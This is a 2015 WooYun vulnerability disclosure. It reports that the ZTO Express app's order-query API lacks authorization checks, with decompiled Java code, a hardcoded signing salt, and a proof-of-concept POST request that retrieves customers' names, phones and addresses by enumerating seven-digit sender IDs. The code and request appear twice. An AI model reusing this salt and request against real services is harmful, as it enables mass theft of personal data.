当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109482

漏洞标题:中通快递某处遍历获取大量订单信息

相关厂商:中通速递

漏洞作者: firexp

提交时间:2015-04-21 19:21

修复时间:2015-06-05 21:26

公开时间:2015-06-05 21:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

可获取收件人电话,地址

详细说明:

漏洞发生在中通快递Android App上,用jeb反编译一下.
在com.geenk.activity.MyZTO_MyOrder这里

public void onClick(View v) {
if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
JSONObject v2 = new JSONObject();
try {
//sendId可遍历,七位数字
v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
v2.put("starttime", "2014-04-28 10:10:10");
v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
v2.put("pageSize", 10);
v2.put("pageIndex", 1);
new Thread() {
public void run() {
String v25;
JSONObject v17;
Object v11;
JSONArray v10;
String v5;
String v4;
try {
v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
new MD5();
v5 = MD5.encodeByMD5(v4);
HashMap v21 = new HashMap();
v21.put("data", this.val$param_zto.toString());
v21.put("data_digest", v5);
v21.put("msg_type", "SEARCH");
v21.put("company_id", "APP");
//向http://japi.zto.cn/zto/api_utf8/commonOrder Post数据未验证用户权限,可获取orderCode
this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.
URL_BILL_QUERY, v21);
System.out.println("订单申请:" + this.this$1.this$0.result);
}
catch(Exception v8) {
v8.printStackTrace();
}
if(!this.this$1.this$0.result.contains("true")) {
goto label_395;
}
JSONArray v16 = new JSONArray();
try {
JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject(
"data").getJSONArray("order_list");
if(v15.length() <= 0) {
goto label_387;
}
int v9;
for(v9 = 0; v9 < v15.length(); ++v9) {
v16.put(v15.get(v9).getString("orderCode"));
}
JSONObject v26 = new JSONObject();
v26.put("orderCode", v16);
v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
//密钥泄漏
new MD5();
v5 = MD5.encodeByMD5(v4);
HashMap v22 = new HashMap();
v22.put("data", v26.toString());
v22.put("data_digest", v5);
v22.put("msg_type", "SEARCHBYCODE");
v22.put("company_id", "APP");
try {
this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication
.URL_BILL_QUERY, v22);
System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
goto label_148;
}
catch(IOException v8_1) {
try {
v8_1.printStackTrace();
label_148:
v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject(
"data").getJSONArray("order_list");
if(v10.length() > 0) {
SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(),
"order_zto", "1", "1");
SQLite.getInstance().closeConn();
}
v9 = 0;
label_176:
while(v9 >= v10.length()) {
goto label_179;
}
}
catch(JSONException v7) {
goto label_203;
}
}
catch(ClientProtocolException v8_2) {
try {
v8_2.printStackTrace();
goto label_148;
}
catch(JSONException v7) {
goto label_203;
}
}
}
catch(JSONException v7) {
goto label_203;
}
try {
v11 = v10.get(v9);
v17 = ((JSONObject)v11).getJSONObject("sender");
v25 = ((JSONObject)v11).getString("orderCode");
goto label_220;
}
catch(JSONException v7) {
try {
v7.printStackTrace();
label_220:
ContentValues v6 = new ContentValues();
v6.put("order_num", v25);
v6.put("address_label", v17.getString("name"));
v6.put("personal_sent", v17.getString("name"));
v6.put("phone_num", v17.getString("mobile"));
v6.put("area", "");
v6.put("address_detail", v17.getString("address"));
v6.put("zip_code", "");
v6.put("sex", "");
v6.put("name_company", "");
v6.put("telephone_number", v17.getString("mobile"));
v6.put("fax", "");
v6.put("website", "");
v6.put("email", "");
v6.put("QQ", "");
v6.put("wangwang", "");
v6.put("province_id", "");
v6.put("province", v17.getString("prov"));
v6.put("city_id", "");
v6.put("city", v17.getString("city"));
v6.put("district_id", "");
v6.put("district", v17.getString("county"));
v6.put("time", ((JSONObject)v11).getString("create_date"));
try {
System.out.println("插入订单个数" + SQLite.getInstance().insert(
this.this$1.this$0.getApplicationContext(), "order_zto",
null, v6));
SQLite.getInstance().closeConn();
}
catch(Exception v7_1) {
try {
v7_1.printStackTrace();
}
catch(JSONException v7) {
goto label_203;
}
}
}
catch(JSONException v7) {
goto label_203;
}
}
++v9;
goto label_176;
try {
label_179:
this.this$1.this$0.handler.sendEmptyMessage(10);
return;
label_387:
this.this$1.this$0.handler.sendEmptyMessage(30);
}
catch(JSONException v7) {
label_203:
v7.printStackTrace();
}
return;
label_395:
this.this$1.this$0.handler.sendEmptyMessage(20);
}
}.start();
}
catch(Exception v0) {
v0.printStackTrace();
}
}
}
});
this.tittle = this.findViewById(2131099684);
this.tittle.setText("我的订单");
this.lv_order = this.findViewById(2131099686);
MyZTO_MyOrder.list = new ArrayList();
MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
Intent v0 = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
v0.putExtra("index", arg2);
MyZTOActivity.group.replaceView(MyZTOActivity.group.getLocalActivityManager().startActivity(
"UpdatePassword", v0.addFlags(67108864)).getDecorView());
}
});
this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
new Thread() {
public void run() {
List v0 = MyZTO_MyOrder.this.getData();
Message v1 = new Message();
v1.what = 1;
v1.obj = v0;
MyZTO_MyOrder.this.handler.sendMessage(v1);
}
}.start();
}


看截图

QQ图片20150421191227.jpg


poc:
POST http://japi.zto.cn/zto/api_utf8/commonOrder
data={"sendId":"1332829","orderCode":["ZT15042134425441"]}&data_digest=cd3e3b9a037a115faed3426295e70898&msg_type=SEARCHBYCODE&company_id=APP

漏洞证明:

漏洞发生在中通快递Android App上,用jeb反编译一下.
在com.geenk.activity.MyZTO_MyOrder这里

public void onClick(View v) {
if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
JSONObject v2 = new JSONObject();
try {
//sendId可遍历,七位数字
v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
v2.put("starttime", "2014-04-28 10:10:10");
v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
v2.put("pageSize", 10);
v2.put("pageIndex", 1);
new Thread() {
public void run() {
String v25;
JSONObject v17;
Object v11;
JSONArray v10;
String v5;
String v4;
try {
v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
new MD5();
v5 = MD5.encodeByMD5(v4);
HashMap v21 = new HashMap();
v21.put("data", this.val$param_zto.toString());
v21.put("data_digest", v5);
v21.put("msg_type", "SEARCH");
v21.put("company_id", "APP");
//向http://japi.zto.cn/zto/api_utf8/commonOrder Post数据未验证用户权限,可获取orderCode
this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.
URL_BILL_QUERY, v21);
System.out.println("订单申请:" + this.this$1.this$0.result);
}
catch(Exception v8) {
v8.printStackTrace();
}
if(!this.this$1.this$0.result.contains("true")) {
goto label_395;
}
JSONArray v16 = new JSONArray();
try {
JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject(
"data").getJSONArray("order_list");
if(v15.length() <= 0) {
goto label_387;
}
int v9;
for(v9 = 0; v9 < v15.length(); ++v9) {
v16.put(v15.get(v9).getString("orderCode"));
}
JSONObject v26 = new JSONObject();
v26.put("orderCode", v16);
v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
//密钥泄漏
new MD5();
v5 = MD5.encodeByMD5(v4);
HashMap v22 = new HashMap();
v22.put("data", v26.toString());
v22.put("data_digest", v5);
v22.put("msg_type", "SEARCHBYCODE");
v22.put("company_id", "APP");
try {
this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication
.URL_BILL_QUERY, v22);
System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
goto label_148;
}
catch(IOException v8_1) {
try {
v8_1.printStackTrace();
label_148:
v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject(
"data").getJSONArray("order_list");
if(v10.length() > 0) {
SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(),
"order_zto", "1", "1");
SQLite.getInstance().closeConn();
}
v9 = 0;
label_176:
while(v9 >= v10.length()) {
goto label_179;
}
}
catch(JSONException v7) {
goto label_203;
}
}
catch(ClientProtocolException v8_2) {
try {
v8_2.printStackTrace();
goto label_148;
}
catch(JSONException v7) {
goto label_203;
}
}
}
catch(JSONException v7) {
goto label_203;
}
try {
v11 = v10.get(v9);
v17 = ((JSONObject)v11).getJSONObject("sender");
v25 = ((JSONObject)v11).getString("orderCode");
goto label_220;
}
catch(JSONException v7) {
try {
v7.printStackTrace();
label_220:
ContentValues v6 = new ContentValues();
v6.put("order_num", v25);
v6.put("address_label", v17.getString("name"));
v6.put("personal_sent", v17.getString("name"));
v6.put("phone_num", v17.getString("mobile"));
v6.put("area", "");
v6.put("address_detail", v17.getString("address"));
v6.put("zip_code", "");
v6.put("sex", "");
v6.put("name_company", "");
v6.put("telephone_number", v17.getString("mobile"));
v6.put("fax", "");
v6.put("website", "");
v6.put("email", "");
v6.put("QQ", "");
v6.put("wangwang", "");
v6.put("province_id", "");
v6.put("province", v17.getString("prov"));
v6.put("city_id", "");
v6.put("city", v17.getString("city"));
v6.put("district_id", "");
v6.put("district", v17.getString("county"));
v6.put("time", ((JSONObject)v11).getString("create_date"));
try {
System.out.println("插入订单个数" + SQLite.getInstance().insert(
this.this$1.this$0.getApplicationContext(), "order_zto",
null, v6));
SQLite.getInstance().closeConn();
}
catch(Exception v7_1) {
try {
v7_1.printStackTrace();
}
catch(JSONException v7) {
goto label_203;
}
}
}
catch(JSONException v7) {
goto label_203;
}
}
++v9;
goto label_176;
try {
label_179:
this.this$1.this$0.handler.sendEmptyMessage(10);
return;
label_387:
this.this$1.this$0.handler.sendEmptyMessage(30);
}
catch(JSONException v7) {
label_203:
v7.printStackTrace();
}
return;
label_395:
this.this$1.this$0.handler.sendEmptyMessage(20);
}
}.start();
}
catch(Exception v0) {
v0.printStackTrace();
}
}
}
});
this.tittle = this.findViewById(2131099684);
this.tittle.setText("我的订单");
this.lv_order = this.findViewById(2131099686);
MyZTO_MyOrder.list = new ArrayList();
MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
Intent v0 = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
v0.putExtra("index", arg2);
MyZTOActivity.group.replaceView(MyZTOActivity.group.getLocalActivityManager().startActivity(
"UpdatePassword", v0.addFlags(67108864)).getDecorView());
}
});
this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
new Thread() {
public void run() {
List v0 = MyZTO_MyOrder.this.getData();
Message v1 = new Message();
v1.what = 1;
v1.obj = v0;
MyZTO_MyOrder.this.handler.sendMessage(v1);
}
}.start();
}


看截图

QQ图片20150421191227.jpg


poc:
POST http://japi.zto.cn/zto/api_utf8/commonOrder
data={"sendId":"1332829","orderCode":["ZT15042134425441"]}&data_digest=cd3e3b9a037a115faed3426295e70898&msg_type=SEARCHBYCODE&company_id=APP

修复方案:

版权声明:转载请注明来源 firexp@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-21 21:25

厂商回复:

感谢白帽子的提醒,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-14 08:01 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    这是手机抓包软件吗?

  2. 2015-06-05 22:12 | RipZ ( 普通白帽子 | Rank:146 漏洞数:38 | 安装tc130精神扰乱装置)

    @刘海哥 同问。。

  3. 2015-06-05 22:24 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    洞主 第一个第二个截图是什么软件啊

  4. 2015-06-05 22:55 | firexp ( 普通白帽子 | Rank:107 漏洞数:9 | 哈哈)

    chrome postman插件

  5. 2015-06-06 13:17 | RipZ ( 普通白帽子 | Rank:146 漏洞数:38 | 安装tc130精神扰乱装置)

    @firexp 3q 我还以为手机上的app神器。。一直用burp截